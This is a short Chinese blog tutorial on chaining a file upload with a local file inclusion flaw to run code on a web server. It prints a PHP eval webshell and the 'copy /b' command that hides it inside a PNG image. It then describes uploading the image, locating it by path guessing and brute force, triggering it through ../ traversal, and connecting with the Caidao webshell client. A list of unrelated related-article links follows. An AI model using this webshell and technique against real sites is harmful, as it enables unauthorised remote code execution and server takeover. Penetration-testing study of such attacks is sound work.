文章目录

  • 文件包含和文件上传结合
    • 条件:存在本地文件包含,并且可以找到上传路径
    • 上传图片马,并找到路径(实战中路径是需要寻找的,使用拼接思路和爆破得到上传的路径)

文件包含和文件上传结合

条件:存在本地文件包含,并且可以找到上传路径

1.制作图片马(方式很多,这只是其中一种)

创建文件夹
在其中放入一张图片文件php.png,和php.php一句话木马
php.php中的一句话木马内容为

<?php @eval($_POST[zft]);?>

和一个写入cmd的bat文件
点击bat文件进入DOS命令,写入"copy php.png /b + php.php zft.png 回车
文件夹中新生成一个叫zft.jpg图片一句话木马

上传图片马,并找到路径(实战中路径是需要寻找的,使用拼接思路和爆破得到上传的路径)

直接访问就是一张图片

因为也存在文件包含,文件包含会解析png中的php代码
使用…/…/…/ 上层目录的思路(找到根目录,然后在从根目录访问),使png文件解析图片中php代码。
注:反斜杠里是两个点不是三个,csdn解析不出来。

菜刀连接

文件包含和文件上传结合相关推荐

  1. 求大师点化,寻求大文件(最大20G左右)上传方案

    之前仿造uploadify写了一个HTML5版的文件上传插件,没看过的朋友可以点此先看一下~得到了不少朋友的好评,我自己也用在了项目中,不论是用户头像上传,还是各种媒体文件的上传,以及各种个性的业务需 ...

  2. obs上传文件到服务器,obs上传文件到指定路径

    obs上传文件到指定路径 内容精选 换一换 需提前准备好OBS桶名.vi /opt/huawei/obsutil_adapter/obsutil_adapter.cfgbackup_path和back ...

  3. 【vue】 前端 基于 vue-simple-uploader 实现大文件断点续传和分片上传

    文章目录 一.前言 二.后端部分 新建Maven 项目 后端 pom.xml 配置文件 application.yml HttpStatus.java AjaxResult.java CommonCo ...

  4. php利用上传文件,如何利用PHP上传文件

    上载文件表单 请选择文件: $upload_file=$_FILES['upload_file']['tmp_name']; $upload_file_name=$_FILES['upload_fil ...

  5. Web.Config文件配置之限制上传文件大小和时间

    在邮件发送系统或者其他一些传送文件的网站中,用户传送文件的大小是有限制的,因为这样不但可以节省服务器的空间,还可以提高传送文件的速度.下面介绍如何在Web.Config文件中配置限制上传文件大小与时间 ...

  6. 打包本地文件, 并使用Winscp上传脚本

    2019独角兽企业重金招聘Python工程师标准>>> @echo off set path=%SystemRoot%\system32;%SystemRoot%;%ProgramF ...

  7. ajax请求多张图片数据库,ajax上传多文件,一次上传多张图片

    ajax上传多文件,一次上传多张图片 作者:PHPYuan 时间:2018-11-04 03:41:44 使用ajax上传文件,指望这个对象:let fd = new FormData(); html ...

  8. sdcms的一个bug,总是提示,该文件不允许被上传

    之前通过sdcms做过一个网站,最近在上传文件时,总是提示,该文件不允许被上传.于是跟踪了一下,发现了一个bug 上传附近是通过admin目录下的Sdcms_Editor_Up.asp来提交的,当文件 ...

  9. SWFUpload上传文件组件,跨域上传文件

    转自: http://zhaowenbinmail.blog.163.com/blog/static/3908086201042743942935/ 解决SWFUpload上传文件组件使用时报告204 ...

最新文章

  1. keras 的 example 文件 variational_autoencoder.py 解析
  2. Responsive Web Design 简单介绍与优缺点、实作入门, 响应式设计
  3. ffmpeg 将拆分的数据合成一帧_FFMPEG 视频分割和合并
  4. 2021-05-31驱动总裁万能网卡版
  5. 最新知宇企业自动发卡系统源码 易支付接口版
  6. 计算机机房中使用ups的作用是什么,机房监控UPS的作用是什么?你可知道?
  7. matlab求解数值积分,应用MATLAB求解数值积分
  8. 计算长方体、四棱锥的表面积和体积 SDUT 3337
  9. 名企面试题个人总结——蘑菇街2017校园招聘(特殊交换)
  10. 企业债拟引入大数据强化信用约束
  11. Remove 以及dorp做实验验证MongoDB删除文档后索引是否会自动删除
  12. Matplotlib中画图,使用带有边框的条线
  13. 网页转PDF文件工具——wkhtmltopdf
  14. ant-bable实现表格输入数据
  15. RGB色彩的计算机表示
  16. 机器学习中的数学——点估计(二):矩估计
  17. Cisco/Ruijie/H3C/华为 AAA认证配置
  18. window server 2003创建域控制器
  19. 【python中级】裁剪1、2寸电子照片
  20. 汤晓丹的第四版计算机操作系统--第十一章总结概述

热门文章

  1. MongoDB 优化器profile
  2. 远程桌面无法复制文本时解决办法
  3. 从Oracle9i中发送电子邮件
  4. Oracle数据块原理深入剖析
  5. Oracle 外连接和 (+)号的用法
  6. Docker 容器CPU设置
  7. Mac OS X下安装和配置Maven
  8. (Linux 日常命令)[20171225]
  9. Xamarin.Android之封装个简单的网络请求类
  10. Oracle 的一些语句